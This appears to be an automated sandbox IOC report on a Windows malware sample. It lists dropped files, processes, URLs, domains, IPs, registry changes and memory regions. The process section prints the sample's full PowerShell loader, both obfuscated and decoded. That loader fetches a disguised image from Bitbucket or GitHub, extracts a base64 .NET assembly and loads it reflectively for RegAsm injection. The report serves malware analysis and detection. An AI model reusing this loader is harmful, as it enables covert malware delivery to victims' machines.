IOC Report
sRMytgfRpJ.exe

loading gif

Files

File Path
Type
Category
Malicious
sRMytgfRpJ.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\Public\Desktop\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:37 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Tmp24A4.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\Tmp24C5.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0oado0gh.fjl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_110bzeks.k3h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nwjw335.j5w.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baonfytu.a2s.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nz3a2pbi.0k1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5vu10dz.2zh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\sRMytgfRpJ.exe
"C:\Users\user\Desktop\sRMytgfRpJ.exe"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c fqt.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DU#MgBs#Gk#dw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://bitbucket.org
unknown
malicious
https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735
unknown
malicious
https://raw.githubusercontent.com
unknown
malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
unknown
https://duckduckgo.com/ac/?q=
unknown
http://tempuri.org/Entity/Id23ResponseD
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
unknown
http://tempuri.org/Entity/Id12Response
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
unknown
http://tempuri.org/
unknown
http://tempuri.org/Entity/Id2Response
unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
unknown
http://tempuri.org/Entity/Id21Response
unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
unknown
https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txt
185.166.143.49
http://tempuri.org/Entity/Id9
unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
unknown
http://tempuri.org/Entity/Id8
unknown
http://tempuri.org/Entity/Id5
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
unknown
http://tempuri.org/Entity/Id4
unknown
http://tempuri.org/Entity/Id7
unknown
http://tempuri.org/Entity/Id6
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
unknown
http://tempuri.org/Entity/Id19Response
unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
unknown
https://nuget.org/nuget.exe
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat
unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
unknown
https://aui-cdn.atlassian.com/
unknown
http://tempuri.org/Entity/Id15Response
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
unknown
http://tempuri.org/Entity/Id6Response
unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://api.ip.sb/ip
unknown
https://bbuseruploads.s3.amazonaws.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/ws/2004/04/sc
unknown
http://tempuri.org/Entity/Id1ResponseD
unknown
https://go.micro
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
unknown
http://tempuri.org/Entity/Id9Response
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://tempuri.org/Entity/Id20
unknown
http://tempuri.org/Entity/Id21
unknown
http://tempuri.org/Entity/Id22
unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
unknown
http://tempuri.org/Entity/Id23
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
unknown
http://tempuri.org/Entity/Id24
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
unknown
http://tempuri.org/Entity/Id24Response
unknown
https://www.ecosia.org/newtab/
unknown
http://tempuri.org/Entity/Id1Response
unknown
https://github.com/Pester/Pester
unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://cdn.cookielaw.org/
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
unknown
http://schemas.xmlsoap.org/ws/2004/04/trust
unknown
http://tempuri.org/Entity/Id10
unknown
http://tempuri.org/Entity/Id11
unknown
http://tempuri.org/Entity/Id12
unknown
http://tempuri.org/Entity/Id16Response
unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
unknown
http://tempuri.org/Entity/Id13
unknown
http://tempuri.org/Entity/Id14
unknown
https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-
unknown
http://tempuri.org/Entity/Id15
unknown
http://tempuri.org/Entity/Id16
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
unknown
http://tempuri.org/Entity/Id17
unknown
http://tempuri.org/Entity/Id18
unknown
http://tempuri.org/Entity/Id5Response
unknown
http://tempuri.org/Entity/Id19
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bitbucket.org
185.166.143.49
malicious
raw.githubusercontent.com
185.199.109.133
malicious
s3-w.us-east-1.amazonaws.com
52.216.210.153
bbuseruploads.s3.amazonaws.com
unknown

IPs

IP
Domain
Country
Malicious
185.196.9.26
unknown
Switzerland
malicious
185.199.109.133
raw.githubusercontent.com
Netherlands
malicious
185.166.143.49
bitbucket.org
Germany
malicious
52.216.210.153
s3-w.us-east-1.amazonaws.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
wextract_cleanup0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
There are 17 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2FC1000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
3068000
trusted library allocation
page read and write
malicious
158A90B6000
trusted library allocation
page read and write
3477000
trusted library allocation
page read and write
158A8CAD000
trusted library allocation
page read and write
11694687000
heap
page read and write
5860000
trusted library allocation
page read and write
1169A756000
trusted library allocation
page read and write
1FD206EF000
heap
page read and write
7901000
heap
page read and write
158A8CCA000
trusted library allocation
page read and write
3498000
trusted library allocation
page read and write
11694615000
heap
page read and write
7928000
heap
page read and write
7AA8000
trusted library allocation
page read and write
25F6D070000
heap
page read and write
1FD20949000
heap
page read and write
3105000
trusted library allocation
page read and write
54A0000
trusted library allocation
page read and write
3162000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
158A72E0000
trusted library allocation
page read and write
4135000
trusted library allocation
page read and write
6C40000
trusted library allocation
page read and write
415B000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page read and write
54F5000
trusted library allocation
page read and write
5520000
trusted library allocation
page read and write
7C2E000
stack
page read and write
21BA1FF000
stack
page read and write
6A00000
trusted library allocation
page read and write
5840000
trusted library allocation
page execute and read and write
3148000
trusted library allocation
page read and write
11694600000
heap
page read and write
32CD000
trusted library allocation
page read and write
71DAFE000
stack
page read and write
5858000
trusted library allocation
page read and write
1412000
trusted library allocation
page read and write
2FB0000
heap
page execute and read and write
7FF7D6FD0000
unkown
page readonly
1FD20735000
heap
page read and write
5B00000
trusted library allocation
page read and write
116A62BD000
trusted library allocation
page read and write
25F6F5A0000
heap
page read and write
7FF7D6FD9000
unkown
page readonly
12B6000
heap
page read and write
66FE000
stack
page read and write
25F6CEBB000
heap
page read and write
7FF7D6FDC000
unkown
page write copy
1FD20724000
heap
page read and write
6A20000
trusted library allocation
page read and write
3402000
trusted library allocation
page read and write
158A73E5000
heap
page read and write
410C000
trusted library allocation
page read and write
71D7CE000
stack
page read and write
25F6CE85000
heap
page read and write
116A7FD2000
trusted library allocation
page read and write
7FF7D6FD9000
unkown
page readonly
5553000
heap
page read and write
69C1000
trusted library allocation
page read and write
7B70000
trusted library allocation
page execute and read and write
FA430C000
stack
page read and write
40F4000
trusted library allocation
page read and write
11694570000
heap
page read and write
13F0000
heap
page read and write
1FD2072B000
heap
page read and write
158A8CB4000
trusted library allocation
page read and write
78E7000
heap
page read and write
3564000
trusted library allocation
page read and write
116A5FD1000
trusted library allocation
page read and write
158A7160000
heap
page read and write
69E1000
trusted library allocation
page read and write
116945F4000
heap
page read and write
1FD223EA000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
35A7000
trusted library allocation
page read and write
158A8F8A000
trusted library allocation
page read and write
158A73D0000
heap
page execute and read and write
6978000
trusted library allocation
page read and write
4094000
trusted library allocation
page read and write
158A8CB0000
trusted library allocation
page read and write
1FD20640000
heap
page read and write
7B90000
trusted library allocation
page execute and read and write
71DB7E000
stack
page read and write
1FD20620000
heap
page read and write
7F1C0000
trusted library allocation
page execute and read and write
3236000
trusted library allocation
page read and write
3244000
trusted library allocation
page read and write
158A7120000
trusted library allocation
page read and write
FA418D000
stack
page read and write
54A4000
trusted library allocation
page read and write
69F0000
trusted library allocation
page read and write
7FFD9B793000
trusted library allocation
page execute and read and write
158A8D06000
trusted library allocation
page read and write
78A0000
heap
page read and write
6F90000
trusted library allocation
page read and write
1488000
heap
page read and write
116945D0000
heap
page read and write
FFA60FE000
stack
page read and write
25F6EC80000
heap
page read and write
1410000
trusted library allocation
page read and write
7C40000
trusted library allocation
page read and write
1FD20722000
heap
page read and write
34DD000
trusted library allocation
page read and write
1FD20791000
heap
page read and write
1FD2070A000
heap
page read and write
32AD000
trusted library allocation
page read and write
6CB0000
trusted library allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
5954000
heap
page read and write
1430000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
407C000
trusted library allocation
page read and write
116A7F52000
trusted library allocation
page read and write
158A7150000
heap
page readonly
116948D0000
trusted library allocation
page read and write
55E0000
heap
page read and write
54D2000
trusted library allocation
page read and write
158A8EDA000
trusted library allocation
page read and write
1169464B000
heap
page read and write
1169AE3C000
trusted library allocation
page read and write
7710000
trusted library allocation
page execute and read and write
7FFD9BA20000
trusted library allocation
page read and write
25F6CE68000
heap
page read and write
158A912F000
trusted library allocation
page read and write
1FD20728000
heap
page read and write
FA373C000
stack
page read and write
6AA0000
trusted library allocation
page execute and read and write
3FCF000
trusted library allocation
page read and write
405C000
trusted library allocation
page read and write
158C11A4000
heap
page read and write
158A71D4000
heap
page read and write
116A627A000
trusted library allocation
page read and write
33B2000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page execute and read and write
1169B8C7000
trusted library allocation
page read and write
158A7140000
trusted library allocation
page read and write
25F6CE81000
heap
page read and write
7FFD9B94A000
trusted library allocation
page read and write
1484000
heap
page read and write
1FD2094E000
heap
page read and write
7A95000
trusted library allocation
page read and write
5964000
heap
page read and write
FFA5D6B000
stack
page read and write
2E2E000
stack
page read and write
6970000
trusted library allocation
page read and write
356D000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
7DF4D9B40000
trusted library allocation
page execute and read and write
FA307E000
stack
page read and write
6C50000
trusted library allocation
page read and write
11694490000
heap
page read and write
1169A121000
trusted library allocation
page read and write
6985000
trusted library allocation
page read and write
1FD223D0000
heap
page read and write
1FD2094C000
heap
page read and write
158C12B0000
heap
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
158C10A7000
heap
page execute and read and write
54E0000
trusted library allocation
page read and write
4FC8000
trusted library allocation
page read and write
4044000
trusted library allocation
page read and write
116A7FAA000
trusted library allocation
page read and write
1FD20763000
heap
page read and write
71E1FE000
stack
page read and write
1FD223EA000
heap
page read and write
4148000
trusted library allocation
page read and write
116A76CB000
trusted library allocation
page read and write
793E000
heap
page read and write
32C7000
trusted library allocation
page read and write
11699E7F000
trusted library allocation
page read and write
78AB000
heap
page read and write
21BA2FF000
stack
page read and write
3220000
trusted library allocation
page read and write
55F0000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
140A000
trusted library allocation
page execute and read and write
62FE000
stack
page read and write
116A7EEA000
trusted library allocation
page read and write
13DD000
trusted library allocation
page execute and read and write
7FFD9B7AC000
trusted library allocation
page read and write
1FD20754000
heap
page read and write
311A000
trusted library allocation
page read and write
1169B73B000
trusted library allocation
page read and write
158C11D0000
heap
page read and write
6B00000
trusted library allocation
page execute and read and write
116946EC000
heap
page read and write
21BA4FE000
stack
page read and write
FA333F000
stack
page read and write
1169A7DF000
trusted library allocation
page read and write
